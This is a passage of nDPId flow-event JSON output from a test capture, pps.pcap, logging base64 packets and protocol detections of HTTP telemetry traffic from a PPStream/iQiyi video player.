VQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDENClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAHAQAAEDAwMCAwUEBAoDCgcAIwECAwQFBhEAEiEHMRMiQQgUUWFxFSMygUKRobEJFiQzUmJywdHwJYLhFzRDc5KywsTS1CY1U2Oiw\/EYNkR0g4aTlKSz01RWZGZ1doSjtBknRUZVhZWWxdW14jdXZf\/EAB0BAAIDAQEBAQEAAAAAAAAAAAUGAwQHAgEIAAn\/xABKEQACAQMDAQUEBwYFAwQBAQkBAgMABBEFEiExBhMiQVEUYXGRIzKBobHB0QcVJELh8DM0UmJyFiXxJjU2Q4KSF0RTc6LCY7LS\/9oADAMBAAIRAxEAPwDytAyeNWtFoU6vyTFgRlSXcbsJ9B8fl+eqxHqdN32eupf+5vW5UmPVHaHUHUpMapNHCmlDdxnBxnP7NTSEouRRHT4I7mdYpW2g0MdQukl49JKsmm3fb0+gS3BuZ97aKUPpwDubWPK4MKHKVEc6GfB+71qP21vapV7RkmgxSmNKRQ8iNNSkh8JU22lxLigdq962\/E4T5c4BOs+RYyXt+9GvEJIzXtxb9zIY85++q2mvKhvb0f6yf6Q1fvM+8sb2vwajqp2x9KEaMLI6f1e5vG9xjq92\/SfdVsZCvmo9z8k5+mpopSG2jmvYSyHaelDtuyUwH0vLXs82ngvqqxcNDk0eP4PljJZU\/wCH5nMjBx9B66X\/AFL6K3H04lNe+x25cNxhuQ3JiKK0bVDI3DgpPxyPz0GUyqzaa9vjp93WrCfER6D4jRLayjnijVvclPAKOG4EOlTUKQvwv6qv0vppy2vUkLpxXv3o2+XSltd5ittlC0KkPf8ACSZPJ47AZ9NGTdbjURtq"} -02161{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1467353196917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjZAADgGss7fGmoUwKhzCABQxlp7yFLTmzJ751AQAB+1AQAAFHWnfu3ebsPmflqKi8LbOppt0aSln8a0oQnzOKX6fXTzo\/s7tX30MrdPrafdJ9wOpqEVa0+eCttATGWR8cDKh8HCNIf2Y7kse++qsW3Z9ZRJmISqRHhlv7ua8gbtu88KwMqCRndtPwwr0FYe3t6IW8WfGaEajdpKO6T7a8f7q6eXHYM73S46PKpTyVFtK32z4SyP6Dn4VD6HUejUGdXqrT6VTI\/vdSmvtxYrHiJaC1rVtGVnhKfUlR4AJ16QVv3OsV+5oM2OzU4HhtpejSW0raWT2G05\/CnHPx0obh9myNSbjod09Pap\/FmsUupt1BtqSFvxFhIVlBSDuGc4POMZxg6\/XEcyITHyaXYrUM4B6Gst3D0dv22KjesSo2u6f4mtIdrsiFKafZjNrwULQrI8Tck7ylIyACVAaiTOjt7U2gUet1O2pFNpVZYVKp8lx5twPNBIWVHYo+Gdp3bV4OAT6a0xfk3q\/SqN1XjzmEVOHe7qXEyae+XGKY3w2pLbYTkbmQG1KIB8iTyd2lNevUKq1roxZ9hNOOsfYa1eNIShLQeSlstNIGw5O1CnASr8W7nOlh7u7jOGFMEOl2hfEkoApQO9P60p+VHRCeW9Ec2SG0srUtlWCdqwE+U4B4Vj8OhesUp+lSlx5aPCeR+JH6Q5wQfgc8YOmdXrjbcYne5Ux2lTJLiXHJbVVkuLOM\/i3K8xIJGVZ+Whhi7ZNK97Rs94XJTtcddcO4\/iJyfiSrOdXLa6mdvGK5v7Kygi320m41QWoypc57\/iT+8apK8zsqsv\/jDpm2pcKnrVl09bSdkbwvvd310AXb\/41P8AxaP3aMQybnNCnTFuDTCmX\/AehhjDIbSAPKnVJGrkeoyvd4EUynsZ2oT6D4nPH5n5aB6xc36KEI3fQaNvZ9v2pWncEydBmyKVU3Ep92qEfylsjdxnHGd37OdCJbRljMvU0q6Zo8N7cql0+1T5129VKLc\/Syqil3Xa9Qt6Y4kqZEyPtQ+njzNODyuDBTkpJxuGdLxuRMrLm2NCed3f0Ua2H7T3WGX7SU6g\/bURj3OhpKYcnGJKkqabS6HFA7Vblo8TAAx2ydKmO5DpLKWocZKNv6WdWraPwBzwa8vLeGwmMKDcR6HNLKkWS6k+LPgSD8vTRRGTIZ2tQ6a6P7RGNXc64okVKlPvo+m7QlVup7Dfkjqb\/I6u7iPOh+55T9XirgVKTSfPK4\/qJc1El3vLmJU2xD\/1lk6Cn788Zwq2hav62Tr4Xw5t8qUj\/V1x3j\/y8VaEMnklWFQg1yY2l9X3TKzhPwOO\/wCrOulNLqCW9q5pS38E5xrn\/HR+bQfdURl+9Ik+MiUCQkp27S3t7ZJwd2dc7URUalWIrlTZe+yVFXiOKSdnrjJHzx664DsR1oitrcEgAYqJ4K4v4Xx+rXwlFKfM\/wDs0YdYLVi2\/R6VPpjS\/DlZS67HytltSOVZVk4J3JIB+fOlYZC9vm8356mTGM1O9q8bbSc1bSFNq3bXV7tdLCXHlbfHA4yVHOAB+v8AdqvebmNspfcQUtr7HXFp7wVbtxV6HUrHCHb1qxDGAw39KNZfTyrU1Q94TGRmImaFLfH8yr8Kvz+HfUumWDVqp44YfiL8BxDToEgJCFKKgkHPx2q5Hw510nqOxJTJT\/Fqmp8SP7sOM+HyrCx\/X8xyeO6vUjFt"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1467353195852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353195852,"pkt":"TF4M6gNlABxCjnAxCABFAAOkMjBAAIAGuBrAqHMIymwO7MZTAFDqT5aSVlCsgFAYQTeESwAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxOTUwNTQmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353195054&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7560000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00913{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1467353195855,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"thread_ts_msec":1467353195855,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMjFAAIAGqNHAqHMIe31vRsZUAFDL+rP6wuI4bVAY\/\/CsBQAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7560000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1467353195956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353195956,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5xWxAADMGdMnKbA7swKhzCABQxlNWUKyA6k+aDlAYACCSWwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00749{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1467353195998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1467353195998,"pkt":"ABxCjnAxTF4M6gNlCABFAAEFPIVAAC8G7\/l7fW9GwKhzCABQxlTC4jhty\/q1U1AYPLjA5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7560000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1467353196104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"thread_ts_msec":1467353196104,"pkt":"TF4M6gNlABxCjnAxCABFAAOJMkZAAIAGuC7AqHMIymwO3cZVAFB2diePbxSNNlAYAQSFkwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0yMDkmdG0zMT05NCZ0bTMyPTMxJnRtMzM9NzgmdG0zND0xJnRtND0xNzYmdG00MT00NyZ0bTQyPTE2JnRtNDM9NzgmdG00ND03JnRtNT0zMjgmdG01MT0wJnRtNTI9MCZ0bTUzPTAmdG01ND02MyZ0bTY9JnRtNjI9MCZ0bTYzPTAmdG03PTAmdG03MT0wJnRtNzI9MCZ0bTczPTAmdG04PTAmdG04MT0wJnRtODI9MCZ0bTgzPTAmdG05PTk2MiZ0bTkyPTE1JnRtOTM9Mjk3JmNoaXBpZD1JbnRlbCUyOFIlMjklMjBDb3JlJTI4VE0lMjklMjBpNSUyRDI1NTdNJTIwQ1BVJTIwJTQwJTIwMSUyRTcwR0h6JnJhPTEmaXNoY2RuPTImcGY9MjAxJnA9MTEmcDE9MTE0JnAyPTMwMDAmc2RrdHA9MSZjMT0zMSZyPTQ3OTUzMTAwMCZhaWQ9MTgwOTMyMzAxJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPVdpbmRvd3MlMjA3JnY9NSUyRTIlMkUxNSUyRTIyNDAma3J2PTIlMkUwJTJFMTAyJmR0PSZodT0tMSZybj0xNDY3MzUzMTk1JmlzbG9jYWw9MCZhcz0wMzExYzVhMGQ1NTk2MDYzZGI1OTQ0YmQ3NmI2Y2JmZiZ2ZT1iMWY5MGY4ZGE2ZmUwMjU4ZDEzNjE2YTgwNzBjYjk5NyZwZT0mdmZybT0mY2hsPSZoY2Rudj0xMC4wLjAuMjkzJnRwY2Q9MCZpc2RybT0xJmh0PTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} +01445{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7560000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=209&tm31=94&tm32=31&tm33=78&tm34=1&tm4=176&tm41=47&tm42=16&tm43=78&tm44=7&tm5=328&tm51=0&tm52=0&tm53=0&tm54=63&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=962&tm92=15&tm93=297&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1467353196204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353196204,"pkt":"ABxCjnAxTF4M6gNlCABFAAC53kZAADMGW\/7KbA7dwKhzCABQxlVvFI02dnYq8FAYAA859QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7560000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00914{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1467353196348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"thread_ts_msec":1467353196348,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMltAAIAGqKfAqHMIe31vRsZXAFCyDhiCAe\/eKVAY\/\/B8ngAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7560000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7560000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1467353196393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1467353196393,"pkt":"TF4M6gNlABxCjnAxCABFAAI9Ml9AAIAGuWPAqHMIymwO28ZWAFBrRx\/mc\/0Jh1AYAQRafgAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRlbmQmcmVzZXQ9MCZyYT0xJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9MzEmcj00Nzk1MzEwMDAmYWlkPTE4MDkzMjMwMSZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnB1PSZvcz1XaW5kb3dzJTIwNyZ2PTUlMkUyJTJFMTUlMkUyMjQwJmtydj0yJTJFMCUyRTEwMiZkdD0maHU9LTEmcm49MTQ2NzM1MzE5NSZpc2xvY2FsPTAmYXM9MDMxMWM1YTBkNTU5NjA2M2RiNTk0NGJkNzZiNmNiZmYmdmU9YjFmOTBmOGRhNmZlMDI1OGQxMzYxNmE4MDcwY2I5OTcmcGU9JnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} +01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7560000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 